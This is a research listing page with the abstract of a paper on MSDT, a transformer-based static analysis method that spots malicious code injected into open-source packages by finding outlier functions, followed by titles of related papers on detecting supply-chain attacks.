Malicious Source Code Detection Using Transformer

09/16/2022
by   Chen Tsfaty, et al.
79

Open source code is considered a common practice in modern software development. However, reusing other code allows bad actors to access a wide developers' community, hence the products that rely on it. Those attacks are categorized as supply chain attacks. Recent years saw a growing number of supply chain attacks that leverage open source during software development, relaying the download and installation procedures, whether automatic or manual. Over the years, many approaches have been invented for detecting vulnerable packages. However, it is uncommon to detect malicious code within packages. Those detection approaches can be broadly categorized as analyzes that use (dynamic) and do not use (static) code execution. Here, we introduce Malicious Source code Detection using Transformers (MSDT) algorithm. MSDT is a novel static analysis based on a deep learning method that detects real-world code injection cases to source code packages. In this study, we used MSDT and a dataset with over 600,000 different functions to embed various functions and applied a clustering algorithm to the resulting vectors, detecting the malicious functions by detecting the outliers. We evaluated MSDT's performance by conducting extensive experiments and demonstrated that our algorithm is capable of detecting functions that were injected with malicious code with precision@k values of up to 0.909.

READ FULL TEXT

page 1

page 15

page 16

page 17

page 18

page 19

page 20

page 21

research
05/19/2020

Backstabber's Knife Collection: A Review of Open Source Software Supply Chain Attacks

A software supply chain attack is characterized by the injection of mali...
research
10/08/2022

Towards the Detection of Malicious Java Packages

Open-source software supply chain attacks aim at infecting downstream us...
research
11/04/2020

If You've Seen One, You've Seen Them All: Leveraging AST Clustering Using MCL to Mimic Expertise to Detect Software Supply Chain Attacks

Trojanized software packages used in software supply chain attacks const...
research
02/28/2022

Practical Automated Detection of Malicious npm Packages

The npm registry is one of the pillars of the JavaScript and TypeScript ...
research
04/08/2022

Taxonomy of Attacks on Open-Source Software Supply Chains

The widespread dependency on open-source software makes it a fruitful ta...
research
03/05/2021

MalBERT: Using Transformers for Cybersecurity and Malicious Software Detection

In recent years we have witnessed an increase in cyber threats and malic...
research
07/19/2021

Detecting Oxbow Code in Erlang Codebases with the Highest Degree of Certainty

The presence of source code that is no longer needed is a handicap to pr...

Please sign up or login with your details

Forgot password? Click here to reset